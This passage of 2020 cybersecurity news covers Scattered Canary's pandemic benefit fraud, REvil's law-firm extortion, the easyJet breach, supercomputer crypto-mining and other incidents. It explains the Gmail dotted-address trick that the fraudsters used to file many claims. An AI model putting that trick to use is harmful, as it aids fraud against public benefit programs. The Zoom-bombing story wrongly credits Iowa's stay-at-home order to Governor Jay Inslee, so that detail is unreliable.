The security company said it had been tracking the Scattered Canary group for over a year and has now briefed the Secret Service of its findings.

The group — which has been involved in BEC, social security fraud and student aid fraud schemes in the past — has targeted at least eight states so far: Hawaii, Florida, Massachusetts, North Carolina, Oklahoma, Rhode Island, Washington, and Wyoming.

In Washington state, it has filed at least 174 fraudulent claims for unemployment benefit since April 29. Agari calculated that these claims were eligible to receive up to $790 a week for a total of $20,540 over a maximum of 26 weeks. Plus, the CARES Act includes $600 in Federal Pandemic Unemployment Compensation each week up to July 31.

This amounts to a potential windfall for the cybercrime gang of $4.9 million in this one state alone, assuming all claims are approved.

Between April 15 and April 29, Scattered Canary filed at least 82 fraudulent claims for CARES Act Economic Impact Payments, 30 of which were accepted by the IRS, explained Agari founder Patrick Peterson.

The scammers are using a tactic first revealed by Agari last year to scale their operations. Namely, they take advantage of a little-known feature in Gmail which means that a single user controls all “dotted versions” of their email address.

Thus, they can register multiple addresses for separate claims payments which are effectively the same address with dots in different places. They will then all redirect to a single inbox.

“As a result of our analysis, we have identified 259 different variations of a single email address used by Scattered Canary to create accounts on state and federal websites to carry out these fraudulent activities,” explained Peterson.

The group is also taking advantage of Green Dot prepaid cards to cash out its fraudulently obtained government payments. These cards are able to receive direct payments and government benefits up to four days before they’re due to be officially paid, meaning they have obvious benefits for fraudsters.

“It shouldn’t be a surprise that scammers are trying to get a piece of the billions of dollars that has flooded the system to try and provide relief to millions of people who have been impacted by the pandemic,” concluded Peterson.

“Based on what we’ve seen from Scattered Canary’s 10-year history of scamming, they will continue to expand their portfolio of cybercrime to try and find new ways to con individuals, businesses, and governments out of as much money as they can.”

Ukrainian Police Arrest Suspected Combo List Mastermind

Ukrainian Police Arrest Suspected Combo List Mastermind

Ukrainian intelligence officers have arrested a man they believe to be Sanix, a notorious cyber-criminal responsible for selling billions of log-ins online.

In concert with cyber police, agents from the Secret Service of Ukraine (SBU) swooped on the individual, who lived in the Ivano-Frankivsk region.

They seized 2TB of stolen user information, mobile phones “with evidence of illegal activities” and cash from illegal transactions amounting to around 190,0000 hryvnias ($7100) and more than $3000.

Officers also took from the arrested man’s apartment PINs for bank cards, cryptocurrency wallets, PayPal account details, and “information about computers hacked for further use in botnets and for organizing DDoS attacks.”

Sanix is widely believed to have been responsible for selling the “Collection” combo lists of email usernames and passwords that first emerged in January 2019.

The first data dump, dubbed “Collection #1,” contained 772 million unique email addresses, the largest single trove to be fed into the HaveIBeenPwned breach notification site, and more than 21 million unique passwords.

It subsequently emerged that this collection contained data that was two or three years old, gathered from multiple sources. However, the person trying to sell them, dubbed “Sanixer” on Telegram, told Brian Krebs at the time that the other packages up for sale were more current.

Together, he claimed they amounted to around 4TB of data, or many billions of records.

Such lists are typically bought and used in credential stuffing attacks, where they’re fed into an automated program and tried simultaneously on multiple sites and accounts in a bid to crack them open.

The reason cyber-criminals have success with this tactic is that computer users continue to reuse their passwords across multiple services.

The SBU said it found evidence of Collection #1 on Sanix’s machine along with “at least seven similar databases” of stolen and cracked/decrypted passwords.

REvil to Auction Stolen Madonna Data

REvil to Auction Stolen Madonna Data

A threat group that claims to have stolen nearly a terabyte of data from a prominent entertainment law firm has said it will put sensitive information relating to Madonna up for auction.

REvil allegedly made off with 756GB of data from New York lawyers Grubman Shire Meiselas & Sack in a ransomware attack earlier this month. The law firm, whose celebrity client list includes LeBron James and Mariah Carey, confirmed last week that it had fallen victim to a ransomware attack. 

After their initial ransom demand for $21m in Bitcoin was not met, REvil doubled it and released 2GB of data that appeared to be taken from contracts involving Lady Gaga. But so far, the law firm has not paid the criminals a dime.

In a statement to Page Six, Grubman Shire Meiselas & Sack said: “We have been informed by the experts and the FBI that negotiating with or paying ransom to terrorists is a violation of federal criminal law.”

However, paying to retrieve the encrypted files may not have been ruled out entirely by the law firm, which told Bleeping Computer: “Unless the FBI determines the ransomware was deployed by a designated terrorist organization or nation state, the FBI treats ransomware investigations as criminal matters.”

Now the threat group, intent on monetizing their crime, has said it will auction off stolen data relating to the singer Madonna on May 25. Bidding is set to start at $1m. 

The criminals claim that the auction will take place confidentially and that they will delete their copy of the data after the sale has been completed. 

Earlier this week, REvil claimed to have data about Donald Trump for sale. The group said that the data was not stolen from Grubman Shire Meiselas & Sack but was "accumulated over the entire time of our activity."

Without producing any evidence to back up its claim, REvil is now conveniently saying that the data on Trump has been sold. On its Tor site, the group stated: "Interested people contacted us and agreed to buy all the data about the US president." 

Commenting on the alleged sale of the Trump data, Emsisoft's Brett Callow said: "Whether they had the presidency-destroying information that they claimed to have is something we may never know. But I still think it was probably a bluff!"

Minnesota Sees Surge in Sex Crimes Against Minors Online

Minnesota Sees Surge in Sex Crimes Against Minors Online

Minnesota law enforcement agencies have reported a surge in reports of sexual crimes against children online since lockdown measures were introduced to impede the spread of the novel coronavirus. 

Authorities believe the jump in crime is linked to children's and predators' spending more time online as schools and businesses remain closed.

The Minnesota Bureau of Criminal Apprehension recorded more than 1,000 complaints involving child pornography or other forms of cyber exploitation of minors in March and April 2020. The disturbing statistic represents a 30% increase in complaints received over the same period last year. 

Drew Evans, superintendent of the Bureau of Criminal Apprehension that operates the Internet Crimes Against Children investigative unit, said it was "very unusual to see such a large jump" year on year.

Sadly, the spike in reports of online child exploitation while the United States is under lockdown isn't unique to Minnesota. The National Center of Missing and Exploited Children recorded more than 6 million tips concerning online child exploitation in March and April 2020. This figure is three times higher than the number recorded over the same time period in 2019.

“That’s probably the largest number of reports in a two-month period that we’ve ever received,” said John Shehan, vice president of the center’s Exploited Children Division. 

According to Shehan, child predators have openly stated on the dark web that they are taking advantage of stay-at-home orders to indulge their illegal predilections. 

Shehan said that the majority of tips received by the center are reports of child pornography, but many concern sextortion incidents in which children are enticed into sharing lewd photos online, usually on social media.

Under social distancing restrictions, Minnesota has suspended the use of grand juries since March 23. Without them, federal prosecutors are struggling to indict crimes involving the sexual exploitation of children online. 

“We’re not indicting cases, but they’re still coming in and we’re still working them,” said Minnesota US Attorney Erica MacDonald. 

She said her office was working with county prosecutors and law enforcement to ensure “we don’t leave people in the community who are posing an imminent threat” to minors.

MacDonald anticipates a boom in indictments once the temporary suspension is lifted.

New Program Trains Dallas Veterans for Cybersecurity Careers

New Program Trains Dallas Veterans for Cybersecurity Careers

A new program to train veterans and their families for careers in cybersecurity was announced today by NPower and AT&T.

NPower is a national nonprofit organization that specializes in delivering cutting-edge information technology training to veterans and their families from underserved communities. The new training program, which starts in late June, will support veterans living in Dallas, Texas, as they embark on a second career in the cybersecurity field.  

AT&T has worked with NPower to augment the curriculum of the new program. The telecommunications company has also supported the program with a cash injection of $200,000. 

AT&T’s contribution to NPower will support 25 veterans and military spouses as they learn the skills necessary to succeed in a new cybersecurity role.  

According to the US Department of Labor (DOL), while some industries are struggling with the effects of lockdown measures introduced to slow the spread of COVID-19, the employment prospects for information security analysts are bright. 

The DOL states that employment of information security analysts is projected to grow 32% from 2018 to 2028, much faster than the average for all occupations.

“As more people use digital communications to stay connected during the COVID-19 crisis, our country needs more cybersecurity professionals who are ready to help lead the fight against cybercrime,” said Roger Thornton, VP, Products and Technology, AT&T Cybersecurity. 

Thornton said that the training veterans receive from the military gives them transferable skills for a new career in digital defense.

“Military veterans are perfect candidates for these positions because they already have many of the technical skills required for a career in information technology," said Thornton. 

"At AT&T, we are proud to employ a large number of military veterans, and we are pleased to be working with NPower to prepare even more veterans for a rewarding career that will allow them to help protect our critical digital infrastructure.” 

NPower’s curriculum exposes students to security and cloud architecture and teaches them how to diagnose networks, manage operating systems, and utilize security tools to address vulnerabilities and threats. Students have an opportunity to earn both CompTIA Security+ and Linux+ certifications.

NTT Report Demonstrates Changing Approaches of Cyber-Criminals

NTT Report Demonstrates Changing Approaches of Cyber-Criminals

There was a marked increase in the volume of cyber-attacks across all industries in 2019 compared with 2018, according to NTT’s 2020 Global Threat Intelligence Report (GTIR) published today. The study also revealed the extent to which cyber-criminals are innovating their methods, which is causing major challenges to all organizations.

According to the global technology service company, the most common methods used by malicious actors last year were remote code execution (15%) and injection (14%) attacks. Such attacks were found to be effective due to organizations’ poor practices related to network, operating system and application configuration, testing, security controls and overall security hygiene.

Additionally, the growing use of artificial intelligence (AI) and machine learning to automate attacks by cyber-criminals was highlighted, with 21% of malware detected found to be in the form of a vulnerability scanner.

NTT also said it had seen a re-emergence of Internet of Things (IoT) weaponization in 2019, with a resurgence of Mirai and derivatives underpinning these attacks.

In the wide-ranging report, it was revealed that technology was the sector most targeted by cyber-criminals last year, involved in 25% of all attacks compared with 17% in the previous year. More than half of attacks aimed at this industry were application-specific (31%) and DoS/DDoS (25%). This was followed by government, at 16% of all attacks, and finance at 15%.

Around 20% of attacks targeted content management systems such as WordPress, Joomla!, Drupal and noneCMS, which criminals see as a means of stealing data from businesses and launching further attacks.

Mark Thomas, global head of threat intelligence at NTT, commented: “The technology sector experienced a 70% increase in overall attack volume. Weaponization of IoT attacks also contributed to this rise and, while no single botnet dominated activity, we saw significant volumes of both Mirai and IoTroop activity. Attacks on government organizations nearly doubled, including big jumps in both reconnaissance activity and application-specific attacks, driven by threat actors taking advantage of the increase in online local and regional services delivered to citizens.”

The report also made some observations regarding the activities of cyber-criminals so far in 2020, particularly in light of the COVID-19 pandemic.

Matthew Gyde, president and CEO of the security division, NTT, said: “The current global crisis has shown us that cyber-criminals will always take advantage of any situation and organizations must be ready for anything. We are already seeing an increased number of ransomware attacks on healthcare organizations and we expect this to get worse before it gets better. Now more than ever, it’s critical to pay attention to the security that enables your business, making sure you are cyber-resilient and maximizing the effectiveness of secure-by-design initiatives.”

easyJet Says Details of Nine Million Customers Accessed in Data Breach

easyJet Says Details of Nine Million Customers Accessed in Data Breach

easyJet has revealed that the personal data of approximately nine million of its customers has been accessed following a “highly sophisticated” cyber-attack on its system. This includes credit card details of a small subset of these customers (2208), with the airline confirming it has already taken action to contact and offer support to those individuals.

For the rest of the customers affected, email addresses and travel details were accessed. Easyjet said these customers will be contacted in the next few days to and the company will “advise them of protective steps to minimize any risk of potential phishing.”

The company took immediate steps to manage the incident once it was aware of the attack and closed off the unauthorized access. It also stated that it has notified the National Cyber Security Centre and the Information Commissioner's Office (ICO) of the breach. The firm has not given any details on the nature of the breach.

There is currently no evidence that the information accessed has been misused; however, the airline is urging its customers to stay alert to any unsolicited communications and to be “cautious of any communications purporting to come from easyJet or easyJet Holidays.”

Johan Lundgren, easyJet chief executive officer, said: “We take the cybersecurity of our systems very seriously and have robust security measures in place to protect our customers’ personal information. However, this is an evolving threat as cyber-attackers get ever more sophisticated.

“Since we became aware of the incident, it has become clear that owing to COVID-19 there is heightened concern about personal data being used for online scams. As a result, and on the recommendation of the ICO, we are contacting those customers whose travel information was accessed and we are advising them to be extra vigilant, particularly if they receive unsolicited communications.”

The incident has come a particularly bad time for easyJet, who face the possibility of a large fine under General Data Protection Regulation (GDPR) rules.

Commenting on the breach, Felix Rosbach, product manager at data security specialists comforte AG, said: “The aviation industry is struggling at present given the current pandemic so seeing another major airline succumb to a data breach is not pleasant. On first glance, easyJet has followed the correct procedures and informed all affected customers who have had their sensitive data compromised. However, this situation could have been avoided.”

Last year, British Airways (BA) was hit by a record £183m GDPR (intention to) fine after failing to prevent a digital skimming attack in 2018.

Trust in Data and Metrics Processes Cause Security Headaches for Financial Services

Trust in Data and Metrics Processes Cause Security Headaches for Financial Services

Security leaders are being challenged to create business metrics, but without having total trust in the data they work with.

According to research by Panaseer of over 400 security leaders in financial services organizations, 96% of companies use metrics to measure their cyber-posture, but 36% said their biggest challenge in creating metrics to measure and report on risk is trust in the data.

Other issues included the resources required to produce metrics (21%), the frequency of requests (14%) and confusion over knowing what metric to use (15%). Fewer than half of respondents (47%) could claim to be very confident that they are using the right security metrics to measure cyber-risk.

Nik Whitfield, CEO, Panaseer, said not knowing the accuracy, timeliness or even limitations of a security metric can render it useless – which is simply unacceptable against a backdrop of tightening regulation and an increasing attack surface.

“We must move on from the era of out-of-date inaccurate metrics to one where they are automated and measured on a continuous basis,” he said. “Financial service organizations, in particular, need trusted and timely metrics into an organization’s technology risk, segmented where possible to critical operations. With this information, the board can then have a better understanding of what risks are and aren't acceptable to keep customer data safe.”

The research determined the primary use for security metrics to be risk management (41%), demonstrating the success of security initiatives (28%), supporting security investment business cases (19%) and board and executive reporting (10%).

The research also found that teams are wasting an inordinate amount of time processing metrics, as it can take an average of five days to produce them. Auditors demand data most frequently at every 10.4 days per month, while boards have a need for updated metrics almost twice a month or more.

Commenting, Bob Sibik, vice-president of Fusion Risk Management,  said that most CEOs “are starved for metrics and want solid metrics as they use them to prepare for how secure they are.” Talking to Infosecurity, Sibik said CEOS like “internal metrics” to show trends and to be able to compare themselves to their peers.

“We rely heavily [on metrics] and metrics are huge for us, and they come in handy and are crucial for day-to-day operations and to define a future strategy,” said Fusion director of cybersecurity, Safi Raza.

Manual processes were also cited as fueling data mistrust. Over half (59%) of security leaders said that they are still relying on spreadsheets to produce metrics and 52% are using custom scripts. Nearly one in five (18%) admitted to relying exclusively on manual processes to develop their security metrics for risk.

FBI Unlocks Pensacola Shooter’s iPhones as Barr Slams Apple

FBI Unlocks Pensacola Shooter’s iPhones as Barr Slams Apple

The US attorney general has again attacked Apple for its stance on device encryption even as he revealed that FBI investigators had managed to access a deceased terrorist’s iPhones.

At a press conference to announce updates to the investigation into fatal shootings at Pensacola Naval Air Station, William Barr, claimed the “relentless efforts and ingenuity of FBI technicians” had helped reveal more about Mohammed Saeed Alshamrani’s ties to Al Qaeda.

However, he couldn’t resist doubling down on long-standing government criticism of Silicon Valley over encryption.

“Apple made a business and marketing decision to design its phones in such a way that only the user can unlock the contents no matter the circumstances,” Barr argued.

“In cases like this, where the user is a terrorist, or in other cases, where the user is a violent criminal, human trafficker, or child predator, Apple’s decision has dangerous consequences for public safety and national security and is, in my judgment, unacceptable.”

Barr again repeated the belief, roundly debunked by the world’s leading encryption experts, that “there is no reason why companies like Apple cannot design their consumer products and apps to allow for court-authorized access by law enforcement while maintaining very high standards of data security.”

In fact, it is widely believed in security circles that if Apple or any tech firm engineered de facto backdoors into their products, the information would eventually end up on the cybercrime underground, undermining security for hundreds of millions of legitimate users.

The Cupertino giant hit back at Barr’s suggestion it had not been any help in the investigation, claiming that it provided iCloud backups, account info and other information on Alshamrani to the FBI.

“The false claims made about our company are an excuse to weaken encryption and other security measures that protect millions of users and our national security,” it continued in a statement.

“It is because we take our responsibility to national security so seriously that we do not believe in the creation of a backdoor — one which will make every device vulnerable to bad actors who threaten our national security and the data security of our customers.”

NHS Trusts Fail Government Cybersecurity Tests

NHS Trusts Fail Government Cybersecurity Tests

Only one of hundreds of NHS trusts has passed the government-backed Cyber Essentials Plus assessment, according to a concerning new report from the National Audit Office (NAO).

Of the 204 trusts with on-site assessments in place, the average score was 63%, according to a new report from the NAO on digital transformation in the health service.

Although this is an increase from an estimated 50% in 2017, trusts require a 100% pass rate. The scheme tests areas such as vulnerability management, access controls, end-user devices, servers and network security.

“NHSX and NHS Digital consider some trusts have reached an acceptable standard, even though they did not score 100% in the assessment, and note there has been a general improvement in cybersecurity across the NHS,” the NAO explained.

“However, while some attempts have been made to address underlying cybersecurity issues, and progress has been made, it remains an area of concern. A 2019 survey of 186 IT leaders across the sector showed that 61% considered cybersecurity one of their top priorities (sixth highest priority overall).”

The NAO expressed particular concerns over legacy systems in the NHS, although it claimed that since the 2017 WannaCry incident a Windows 10 licensing agreement has been reached which should partly address this. A Data Security Centre was also launched to help prevent, detect and respond to cyber-attacks.

The NAO’s report on the ransomware worm laid the blame on systemic failures at the NHS and Department of Health. Although NHS Digital issued, in March and April 2017, critical alerts to patch the flaws which were ultimately exposed by WannaCry, there was no formal mechanism for checking whether trusts had complied, it found.

Incident response plans were also found not to have been tested at a local level, meaning some trusts couldn’t communicate with national bodies when the ransomware struck.

Around a third of trusts were disrupted due to the cyber-attack, with an estimated 19,000 appointments and operations cancelled. It’s calculated to have cost the NHS £92m, mainly in emergency IT support.

Cloud Exposes SMBs to Attack as Human Error Grows

Cloud Exposes SMBs to Attack as Human Error Grows

SMBs are increasingly seeing the same kinds of cyber-attacks as their larger counterparts as cloud and web-based applications help to close the gap between the two, according to Verizon.

The vendor’s annual Data Breach Investigations Report is compiled from an analysis of 32,002 security incidents and 3950 confirmed breaches.

The report claimed that smaller businesses comprised just over a quarter (28%) of the total number of breaches.

However, more telling was the alignment of top breach-related threats: phishing came top for both SMBs and larger firms, with password dumper malware and stolen credentials featuring in the top four for both.

More than a fifth (20%) of attacks on SMBs were against web applications and involved the use of stolen credentials.

In fact, attacks against cloud-based data were on the up overall with web app threats doubling to 43%. Credential theft, errors and social attacks like phishing accounted for over two-thirds (67%) of breaches.

Preventing human error has also become an increasingly important factor in cybersecurity. This year’s report found that related breaches are even more common than malware-driven breaches and almost as popular as phishing.

In total, human error accounted for 22% of all breaches, with misdelivery of emails slightly more common than the growing challenge of misconfiguration.

“The fact that misconfiguration is in the top five action varieties for breaches is an important acknowledgment that not all incidents are the result of an exploited vulnerability. Misconfigurations actually lead to more breaches than exploited systems, but organizations often don’t put the same effort into assessing them as they do scanning for vulnerabilities,” argued Tripwire VP of product management, Tim Erlin.

“At a high level, the key things for every organization to worry about are brute forced and stolen credentials, and web applications.”

On the plus side, patching appears to be getting better: just one in 20 breaches exploit vulnerabilities, and 81% were contained within a day or less.

Elsewhere, the insider threat remains pronounced, accounting for 30% of all breaches, while organized crime dominated the external breaches, comprising 55% of the overall total.

“If you want to protect yourself from the most common breaches, protect your web servers, your workstations and your mail infrastructure,” said Erlin.

Chicago Children’s Hospital Sued Over Data Breaches

Chicago Children's Hospital Sued Over Data Breaches

Lurie Children's Hospital of Chicago is being sued by the parent of a pediatric patient over two recent data breaches. 

An anonymous plaintiff and her 4-year-old daughter filed a complaint against the hospital and two former employees in the Circuit Court of Cook County, Illinois, on May 8. 

Mother and daughter, referred to as Jane Doe and Baby Doe, are seeking class-action status and a trial by jury with the support of law firm Edelson P.C. 

In the suit, the plaintiffs accuse Lurie of breach of contract, breach of confidentiality, and negligent supervision for allegedly failing to keep Baby Doe's medical records safe. 

Jane Doe received a letter on December 24, 2019, informing her that her daughter's records had been accessed by an unnamed nursing assistant without authorization between September 10, 2018, and September 22, 2019

Baby Doe, then aged 3, had been taken to Lurie for an examination after her mother developed a suspicion that the toddler had become a victim of sexual abuse. 

The suit alleges that Baby Doe's records were accessed as part of a larger data breach in which thousands of patients’ names, addresses, dates of birth, and medical information like diagnoses, medications, appointments, and procedures were accessed without authorization. 

Lurie fired the employee at the center of the cybersecurity incident after the breach was detected. The hospital stated at the time that no evidence had been found to suggest the employee had misused or shared any patient data. 

On Monday, May 4, Jane Doe was notified of a second data breach concerning her daughter's medical records by Lurie. The hospital said that Baby Doe's records were accessed without authorization by another unnamed hospital worker between November 1, 2018, and February 29, 2020.

The plaintiffs allege that Lurie failed to state what action would be taken to ensure the security of the patient’s medical records.

In a statement, Lurie spokesperson Julie Pesch said: “In December 2019 and May 2020, Lurie Children’s notified some of our patients about two nurse assistants who had accessed certain patients’ medical records without an identified patient need. We have no reason to suspect any misuse of patient information associated with this incident. Lurie Children’s addressed this issue in accordance with our disciplinary policies, and the employees no longer work for the Hospital.”

Texas Takes Second Ransomware Hit

Texas Takes Second Ransomware Hit

The Texas Department of Transportation (TxDOT) has been hit by ransomware just days after the state's judiciary system suffered the same fate. 

According to a May 15 message posted on Twitter by TxDOT, the attack struck on May 14, when a threat actor gained unauthorized access to the department's computer network.

The network was shut down as soon as the attack was detected in an effort to contain the threat and prevent any further unauthorized access. 

TxDOT executive director James Bass said in the statement: "We want every Texan to rest assured that we are doing everything we can to swiftly address this issue. We also are working to ensure critical operations continue during this interruption."

Federal law enforcement was informed of the attack, and TxDOT said that no mercy will be shown to whomever is found to be responsible for it.

Bass said: "TxDOT is working closely with the FBI to find the individual(s) responsible and prosecute them to the fullest extent of the law."

TxDOT oversees all air, road, and railway transportation in the state. At time of publication, the department's website was back up and running. 

News of the TxDOT attack comes days after a ransomware attack hit the state's judicial agencies and appellate courts on May 8. As a result of the incident, access to case management systems was lost and court offices were unable to connect to the internet.

With the usual channels disabled by cyber-criminals, staff were reduced to using social media to announce legal rulings. 

The first attack was identified by the Office of Court Administration (OCA). No information as to whether the two attacks were linked in any way has been forthcoming. 

Neither the OCA nor TxDOT shared any information regarding what, if any, data had been encrypted or stolen. Similarly, neither ransomware target has disclosed any details of a ransom demand.

Texas is fast becoming a hotspot for cyber-attacks. In 2019, ransomware was used to target 22 local governments across the Lone Star State in a single attack. The collective ransom demand for the coordinated assault was $2.5m.

Cyber Insurers Increase Scrutiny Amid Pandemic

Cyber Insurers Increase Scrutiny Amid Pandemic

Heightened cybersecurity risks triggered by the outbreak of COVID-19 are causing insurers to grill policyholders more closely.

According to the Wall Street Journal, insurers have increased their scrutiny of policyholders' security arrangements as the rise in remote working drives up risk. 

Stephen Viña, a senior vice president in Marsh & McLennan Co.’s cyber insurance brokering business, told the WSJ that insurers want more details than ever before. 

Describing the surveys insurers ask companies to complete so that their risk can be assessed and their premiums calculated, Viña said: "There are a lot more questions being asked."

Companies are now expected to supply more details than before regarding how they would respond to a data breach and what action they would take if hit by ransomware or any other form of cyber-attack.

Depending on how the companies answer the survey, they could end up with a costlier policy or in some cases be denied coverage. 

Viña said insurers are deeply concerned that working conditions during the pandemic will expose companies to additional risks that simply weren't considered when their insurance policy was being created. 

For example, companies that had tight control over the security of employees working in a central office could face increased and unplanned-for risks as workers toil remotely to comply with lockdown measures, relying on home networks and personal equipment. 

Chief innovation officer at London-based insurer CFC Underwriting Ltd. Graeme Newman said policyholders were being asked to show insurers that remote-working situations had been taken into account in their business continuity plans.

Cyber-insurance claims have increased as data breaches and ransomware attacks continue to blight every industry. According to data from regulatory filings compiled by Fitch Ratings, direct loss ratios for stand-alone cyber-insurance policies rose to 47% in 2019 from 34% in 2018. Direct loss ratios measure the percentage of income paid to claimants by insurance companies.

Fitch managing director Jim Auden said that although the data is incomplete because it doesn't contain certain elements, including reimbursements insurers received from their own insurers, it is a good indicator of overall trends. 

He said: “We think that with more risk being covered, and maybe newer underwriters getting into the business that don’t have that pricing expertise, that’ll lead to more losses over time."

Responsible Cyber Announces Identity Acquisition and New Shareholders

Responsible Cyber Announces Identity Acquisition and New Shareholders

Singaporean startup Responsible Cyber has announced the acquisition of fellow startup Secucial and new shareholders.

The Secucial acquisition adds a mobile digital identity wallet to its portfolio; a decentralized identity system that includes a mobile app with an identity wallet to provide secure authentication with biometrics and contextual multi-factor authentication to enable exchange of ID documents with a third party.

Responsible Cyber is part of the ICE71 Scale program, a landing pad that helps international and local cybersecurity startups seize opportunities and grow their businesses in Singapore and within Asia Pacific.

As a result of the acquisition, Responsible Cyber has also added NUS Enterprise, the entrepreneurial arm of the National University of Singapore, and Singtel Innov8, the venture capital arm of the Singtel Group, as new shareholders. NUS Enterprise and Singtel Innov8 are the co-founders of ICE71, the region’s first cybersecurity entrepreneur hub.

Secucial was part of the first cohort to graduate from ICE71 Accelerate, a three-month accelerator program designed to help early-stage cybersecurity startups achieve a product market fit in a unique technical and demanding industry. 

“We welcome NUS Enterprise and Singtel Innov8 as our shareholders, especially during uncertain times like these,” said Magda Chelly, founder and managing director, Responsible Cyber.

“Our platform addresses the needs of business owners who do not have the right means and technical knowledge to implement cybersecurity measures for their businesses. By providing a user-friendly cybersecurity solution, we help small and medium businesses to continue operating remotely, reliably and securely, especially during this COVID-19 pandemic.”

Crypto-Miners Take Out Supercomputers Working on #COVID19

Crypto-Miners Take Out Supercomputers Working on #COVID19

Supercomputers across Europe appear to have been targeted by cryptocurrency miners over the past few days, forcing offline key IT resources working on COVID-19 research.

One of the first to report problems was the University of Edinburgh’s Archer supercomputer, which was taken offline last Monday after “a security exploitation on the Archer login nodes.”

Working with the National Cyber Security Centre (NCSC), the institution has been forced to rewrite all existing passwords and SSH keys. It is still down at the time of writing.

The Computer Security Incident Response Team (CSIRT) at the European Grid Infrastructure (EGI) organization revealed two potentially related security incidents in an analysis on Friday. In both, a malicious actor was blamed for targeting academic data centers for CPU mining.

“The attacker is hopping from one victim to another using compromised SSH credentials,” it explained.

The attackers were logging in from three compromised networks, at the University of Krakow in Poland, Shanghai Jiaotong University and the China Science and Technology Network. It has been claimed that some credentials are shared between academic institutions, making it easier for would-be attackers.

It’s also claimed that the attackers are exploiting CVE-2019-15666 for privilege escalation before deploying a Monero cryptocurrency miner.

Other institutions affected by the campaign include the Swiss Center of Scientific Computations (CSCS), the bwHPC, which runs supercomputers across the German region of Baden-Württemberg, the University of Stuttgart’s HPE Hawk machine, the Leibniz Computing Center (LRZ) and an unnamed facility in Barcelona.

“What’s interesting about this is that it seems hackers have targeted the supercomputers completely remotely for the first time, as before there has always been an insider who installs the crypto-mining malware used for the attack,” argued ESET cybersecurity specialist, Jake Moore.

“All the SSH login credentials will now need resetting, which may take a while, but this is vital to stop further attacks. Once a list of credentials is compromised, it is a race against time to have these reset. Unfortunately, the lead time is usually enough of a head start for threat actors to take advantage of the mining software.”

Police Catch Suspects Planning #COVID19 Hospital Ransomware

Police Catch Suspects Planning #COVID19 Hospital Ransomware

Police in Europe have swooped on a cybercrime gang they suspect of planning ransomware attacks using COVID-19 lures against hospitals.

The four-man “Pentaguard” group was formed at the start of the year, according to the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT).

It amassed tools including ransomware, remote access trojans (RATs), and SQL injection tools to launch attacks against public and private sector organizations with the aim of stealing data, defacing websites and encrypting key systems.

“They intended to launch ransomware attacks, in the near future, on some public health institutions in Romania, generally hospitals, using social engineering by sending a malicious executable application, from the Locky or BadRabbit families, hidden in an e-mail and in the form of a file that apparently would come from other government institutions, regarding the threat of COVID-19,” the DIICOT update explained.

“Through this type of attack, there is the possibility of blocking and seriously disrupting the functioning of the IT infrastructures of those hospitals, part of the health system, which plays a decisive role at this time, to combat the pandemic with the new coronavirus.”

Officers carried out three house searches in Romania and one in neighboring Moldova.

Hospitals around the world have been under constant attack over the past few weeks as ransomware gangs try to take advantage of the current pandemic to put pressure on their victims to pay.

Microsoft warned recently that many of these attacks were detected using APT-style techniques such as exploitation of a VPN or remote access vulnerability, followed by reconnaissance, privilege escalation and lateral movement.

In April, INTERPOL was forced to issue a Purple Notice to all of its 194 member countries about the cyber-threat to hospitals and other front-line organizations.

REvil Ransomware Gang Threatens to Release Dirt on Trump

REvil Ransomware Gang Threatens to Release Dirt on Trump

Ransomware attackers that stole data from a New York law firm on its celebrity clients have doubled their demand and threatened to release sensitive information on US President Donald Trump.

The REvil group claimed to have lifted 756GB of data from Grubman Shire Meiselas & Sack, which counts the likes of Madonna, Bruce Springsteen, Run DMC and Mariah Carey among its clients.

The media and entertainment law firm confirmed last week that it had been a victim of a cyber-attack and that it was “working around the clock to address these matters.”

However, the ransomware group’s original deadline for payment of $21m ran out at the end of last week, and it has now upped the demand to $42m.

To show they mean business, the cyber-criminals recently released over 2GB of stolen documents related to contract dealings of Lady Gaga.

They also threatened to publish dirt on Donald Trump, although reports suggest he was never a client of the law firm.

“There's an election race going on, and we found a ton of dirty laundry on time. Mr Trump, if you want to stay President, poke a sharp stick at the guys, otherwise you may forget this ambition forever,” they claimed on a dark web site.

“To you voters, we can let you know that after such a publication, you certainly don't want to see him as President. Well, let's leave out the details. The deadline is one week.”

Recorded Future’s senior solutions architect, Allan Liska, pointed to the threats as just the latest in a long line of incidents where ransomware groups first breach their victims in a bid to force payment.

“Ransomware groups have grown increasingly bold in their targets and their ransom demands and so far have been able to operate with very little pushback,” he added.

“In addition, it has long been suspected that this group operates within Russia's locus of control. The Kremlin generally turns a blind eye to these activities, as long as the threat actors don't target Russian citizens. However, going after an ally of Russia may force Russian cybersecurity forces to turn their attention to the REvil team as well.”

Trump has consistently refused to comply with demands from federal prosecutors to release information on his financial affairs. Separate investigations are looking at whether he committed tax fraud and if his business dealings left him subject to the influence of foreign individuals or governments.

Iowa Civil Rights Meeting Zoom-bombed

Iowa Civil Rights Meeting Zoom-bombed

A Des Moines civil rights meeting was abandoned yesterday after being digitally crashed twice by racist cretins.

The joint meeting between the city's Civil and Human Rights Commission and Des Moines City Council was being held virtually using the videoconferencing app Zoom due to lockdown measures intended to decelerate the spread of COVID-19.

Before the meeting was called to order, an unknown person gained access to the online gathering to aim offensive comments at the commission. The attacker singled out two specific members of the commission, leveling several ignorant, racist slurs and trotting out the n-word.

As the meeting opened, Joshua Barr, Des Moines's civil and human rights director, told the council that he and other members of the commission had been "zoom-bombed."

“There were some racial slurs and things that were posted. I’ll just be candid with it," Barr told the virtual meeting attendants. "If that does happen again, we will have to end the meeting for the protection of the public."

After Barr's acknowledgement, an attempt was made to continue with the meeting. But moments later, as Mayor Frank Cownie delivered his opening remarks, a Zoom-bomber interrupted proceedings with more repellant rubbish.

To spare the attendees from any more offensive idiocy, the meeting was then cancelled. 

Cownie described the actions of the zoom-bomber as a "disgusting and sickening display of racial intolerance" that would only strengthen the city's resolve to educate those unfortunate people who in 2020 are somehow still mired in a ridiculous historical hatred.

Commission chair Kameron Middlebrooks said the sorry incident underlined the need for the community to come together in a spirit of love, equality, and positivity. 

"What occurred proves hate and ignorance is alive and well. But I stand steadfast in my resolve to continue to be an agent of change," said Middlebrooks. "Our commission has started the path to bridging the gap we face in our community and will continue to work cooperatively with council and Des Moines residents to ensure we drive this hate into the darkness and uplift neighbors with love and equitable policies."   

The City of Des Moines is currently operating under a Proclamation of Emergency issued on March 5, 2020, and Governor Jay Inslee’s Stay-at-Home order issued March 23, 2020, in response to the COVID-19 pandemic.

Norway’s Wealth Fund Loses $10m in Data Breach

Norway's Wealth Fund Loses $10m in Data Breach

Norway's state-owned investment fund Norfund has halted all payments after losing $10m in an "advanced data breach."

